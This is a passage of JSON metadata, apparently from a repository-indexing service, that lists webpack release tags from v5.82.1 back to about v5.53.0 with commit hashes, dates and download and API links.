599871765e0167cacf8318944a9","kind":"tag","published_at":"2023-05-10T15:36:00.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.82.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.82.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.82.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.82.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.82.1/manifests"},{"name":"v5.82.0","sha":"1018ca80b31ea72436510398cca5be335b6ac81c","kind":"tag","published_at":"2023-05-03T17:03:17.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.82.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.82.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.82.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.82.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.82.0/manifests"},{"name":"v5.81.0","sha":"5c016a8ec1bbfd73a7fc20d4b474938e61ee3a57","kind":"tag","published_at":"2023-04-26T14:41:18.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.81.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.81.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.81.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.81.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.81.0/manifests"},{"name":"v5.80.0","sha":"9ac1728ee359efbbd1eb317f4a12c0f8136a690e","kind":"tag","published_at":"2023-04-19T16:56:31.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.80.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.80.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.80.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.80.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.80.0/manifests"},{"name":"v5.79.0","sha":"ecdcc1a1d02a3097acb9ebc0896365ae1f4d25e2","kind":"tag","published_at":"2023-04-12T15:12:33.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.79.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.79.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.79.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.79.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.79.0/manifests"},{"name":"v5.78.0","sha":"e51f8347026588c90f9bd91681597e97f24f40c9","kind":"tag","published_at":"2023-04-05T18:09:33.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.78.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.78.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.78.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.78.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.78.0/manifests"},{"name":"v5.77.0","sha":"263f29189060529198b7ab4dbddfd2dca46bd96e","kind":"tag","published_at":"2023-03-29T14:19:20.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.77.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.77.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.77.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.77.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.77.0/manifests"},{"name":"v5.76.3","sha":"8ac9616280aebfb61ae7484f06ad1979d73e6a56","kind":"tag","published_at":"2023-03-22T14:59:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.76.3","html_url":"https://github.com/webpack/webpack/releases/tag/v5.76.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.76.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.76.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.76.3/manifests"},{"name":"v5.76.2","sha":"dbf7bf39ab96e1462603435c150d601bb69ebe4e","kind":"tag","published_at":"2023-03-15T15:00:55.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.76.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.76.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.76.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.76.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.76.2/manifests"},{"name":"v5.76.1","sha":"21be52b681c477f8ebc41c1b0e7a7a8ac4fa7008","kind":"commit","published_at":"2023-03-10T22:59:46.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.76.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.76.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.76.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.76.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.76.1/manifests"},{"name":"v5.76.0","sha":"97b1718720c33f1b17302a74c5284b01e02ec001","kind":"commit","published_at":"2023-03-08T17:17:42.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.76.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.76.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.76.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.76.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.76.0/manifests"},{"name":"v5.75.0","sha":"8241da7f1e75c5581ba535d127fa66aeb9eb2ac8","kind":"tag","published_at":"2022-11-09T15:27:26.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.75.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.75.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.75.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.75.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.75.0/manifests"},{"name":"v5.74.0","sha":"8f87b50dc7ac24eb5c91fd0d55a22e34e252863c","kind":"tag","published_at":"2022-07-25T08:00:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.74.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.74.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.74.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.74.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.74.0/manifests"},{"name":"v5.73.0","sha":"36051a5ca77b4fa33fac651e1af650c7b910a873","kind":"tag","published_at":"2022-06-02T11:24:52.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.73.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.73.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.73.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.73.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.73.0/manifests"},{"name":"v5.72.1","sha":"08ecfbbc035b12f2ed5c0b83b53011dfe57ae7c9","kind":"tag","published_at":"2022-05-10T10:41:34.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.72.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.72.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.72.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.72.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.72.1/manifests"},{"name":"v5.72.0","sha":"d3a0f8de03f26a83b4d5db3cfe177617a3801df3","kind":"tag","published_at":"2022-04-07T12:36:00.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.72.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.72.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.72.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.72.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.72.0/manifests"},{"name":"v5.71.0","sha":"c2079f7e7666a913d6fdad4b9102ffb0d3801cc8","kind":"tag","published_at":"2022-04-01T13:41:24.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.71.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.71.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.71.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.71.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.71.0/manifests"},{"name":"v5.70.0","sha":"5a26b7c4a923c42022ca97fe9cbf46907a20d6d8","kind":"tag","published_at":"2022-03-03T14:23:28.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.70.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.70.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.70.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.70.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.70.0/manifests"},{"name":"v5.69.1","sha":"dfdc8b133d3d49371251e29efeefb9d31b982c9e","kind":"tag","published_at":"2022-02-17T13:46:25.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.69.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.69.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.69.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.69.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.69.1/manifests"},{"name":"v5.69.0","sha":"9d21401151b32abcefad0ffdb3238da91e2089ef","kind":"tag","published_at":"2022-02-15T12:33:48.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.69.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.69.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.69.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.69.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.69.0/manifests"},{"name":"v5.68.0","sha":"f593d98453e7920bf65f24bf051cd67b5704b59d","kind":"tag","published_at":"2022-01-31T16:25:38.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.68.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.68.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.68.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.68.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.68.0/manifests"},{"name":"v5.67.0","sha":"4abe329dcdaea60371c03c0d85c3a3994d875138","kind":"tag","published_at":"2022-01-21T17:44:49.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.67.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.67.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.67.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.67.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.67.0/manifests"},{"name":"v5.66.0","sha":"0105bc1f005d78e3819a567ffb91432683569070","kind":"tag","published_at":"2022-01-12T08:23:05.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.66.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.66.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.66.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.66.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.66.0/manifests"},{"name":"v5.65.0","sha":"323d65e2b1f6d275bf1b4a93ef753f027de78193","kind":"tag","published_at":"2021-12-06T13:57:22.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.65.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.65.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.65.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.65.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.65.0/manifests"},{"name":"v5.64.4","sha":"d3cd4cb6e38338237fe722d4b7feae2244c425c5","kind":"tag","published_at":"2021-11-25T15:49:04.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.64.4","html_url":"https://github.com/webpack/webpack/releases/tag/v5.64.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.64.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.64.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.64.4/manifests"},{"name":"v5.64.3","sha":"c66e4ce32027fd31935ce9197c219e46308ebd3f","kind":"tag","published_at":"2021-11-24T08:27:45.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.64.3","html_url":"https://github.com/webpack/webpack/releases/tag/v5.64.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.64.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.64.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.64.3/manifests"},{"name":"v5.64.2","sha":"0065223c4ddac3bf872bc8d660ef1e9a63afa080","kind":"tag","published_at":"2021-11-20T13:43:51.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.64.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.64.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.64.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.64.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.64.2/manifests"},{"name":"v5.64.1","sha":"3d5503a5b535b89bbdde78535c1839cefd88e4fa","kind":"tag","published_at":"2021-11-15T17:16:22.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.64.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.64.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.64.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.64.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.64.1/manifests"},{"name":"v5.64.0","sha":"789e58514b5747f6474bc247e4e104ce22892a2c","kind":"tag","published_at":"2021-11-11T14:16:53.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.64.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.64.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.64.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.64.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.64.0/manifests"},{"name":"v5.63.0","sha":"f011c70aacbd4dd3c4e518b9b9d8ea945dce0a9a","kind":"tag","published_at":"2021-11-09T19:30:24.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.63.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.63.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.63.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.63.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.63.0/manifests"},{"name":"v5.62.2","sha":"3aed1fe0249f8730a35fab62e3cdc3b399b0b6e9","kind":"tag","published_at":"2021-11-09T11:12:21.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.62.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.62.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.62.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.62.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.62.2/manifests"},{"name":"v5.62.1","sha":"daba59b3d60e7895543b6563682c209e4ad6b8b8","kind":"tag","published_at":"2021-11-05T16:26:04.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.62.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.62.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.62.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.62.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.62.1/manifests"},{"name":"v5.62.0","sha":"04640dcc757c8b3e78c6cbf6e4dda7cbbde33fe2","kind":"tag","published_at":"2021-11-05T14:56:11.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.62.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.62.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.62.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.62.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.62.0/manifests"},{"name":"v5.61.0","sha":"0306510f7d1b9b13900f1dcf78a767c2ed390a61","kind":"tag","published_at":"2021-10-29T14:00:19.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.61.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.61.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.61.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.61.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.61.0/manifests"},{"name":"v5.60.0","sha":"f0298fe46fc22eebf42eb034a9435d7c19aeddd9","kind":"tag","published_at":"2021-10-25T16:20:06.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.60.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.60.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.60.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.60.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.60.0/manifests"},{"name":"v5.59.1","sha":"3dbbdcb28cce3860247f06a18e48f536ab266834","kind":"tag","published_at":"2021-10-20T21:39:50.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.59.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.59.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.59.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.59.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.59.1/manifests"},{"name":"v5.59.0","sha":"19ca23f062544263f48d2947da0ecfb29ae0bb36","kind":"tag","published_at":"2021-10-19T17:54:30.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.59.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.59.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.59.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.59.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.59.0/manifests"},{"name":"v5.58.2","sha":"8a6d156c156282dd3d0ba001187c282402a1177f","kind":"tag","published_at":"2021-10-13T09:39:05.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.58.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.58.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.58.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.58.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.58.2/manifests"},{"name":"v5.58.1","sha":"2eecffb2739d13d3095568d118ffc0baacec5cd8","kind":"tag","published_at":"2021-10-08T13:41:06.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.58.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.58.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.58.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.58.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.58.1/manifests"},{"name":"v5.58.0","sha":"7666277551be32947227e80fb2fccdbbe656254b","kind":"tag","published_at":"2021-10-07T15:48:14.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.58.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.58.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.58.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.58.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.58.0/manifests"},{"name":"v5.57.1","sha":"0581bb3c1c32bcb3e182a0f732b862a6c5bb7846","kind":"tag","published_at":"2021-10-05T18:25:17.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.57.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.57.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.57.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.57.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.57.1/manifests"},{"name":"v5.57.0","sha":"e841ab01417f8e1dd6a2533638f848b5ad0c7d16","kind":"tag","published_at":"2021-10-05T15:06:43.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.57.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.57.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.57.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.57.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.57.0/manifests"},{"name":"v5.56.1","sha":"ed55e200efb0dad7716d509c82a6ed82aee86c51","kind":"tag","published_at":"2021-10-04T07:32:43.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.56.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.56.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.56.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.56.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.56.1/manifests"},{"name":"v5.56.0","sha":"4eb122092d9696ac5286bc2dcf3eacfb901f4fed","kind":"tag","published_at":"2021-10-01T14:12:50.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.56.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.56.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.56.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.56.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.56.0/manifests"},{"name":"v5.55.1","sha":"e78403d6a8d4e682fbd4a0eb58f042866cfde42a","kind":"tag","published_at":"2021-09-29T08:56:23.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.55.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.55.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.55.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.55.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.55.1/manifests"},{"name":"v5.55.0","sha":"5db30851c7ed007d8f94150ee2c6a1b47d10d388","kind":"tag","published_at":"2021-09-28T17:39:42.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.55.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.55.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.55.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.55.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.55.0/manifests"},{"name":"v5.54.0","sha":"45829826701ff6582ea16bc36376d105ff264c26","kind":"tag","published_at":"2021-09-24T19:07:08.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.54.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.54.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.54.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.54.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.54.0/manifests"},{"name":"v5.53.0","sha":"6796b73a1ab83739f0e722d914676c9dd58d65e2","kind":"tag","published_at":"2021-09-16T13:52:02.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.53.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.5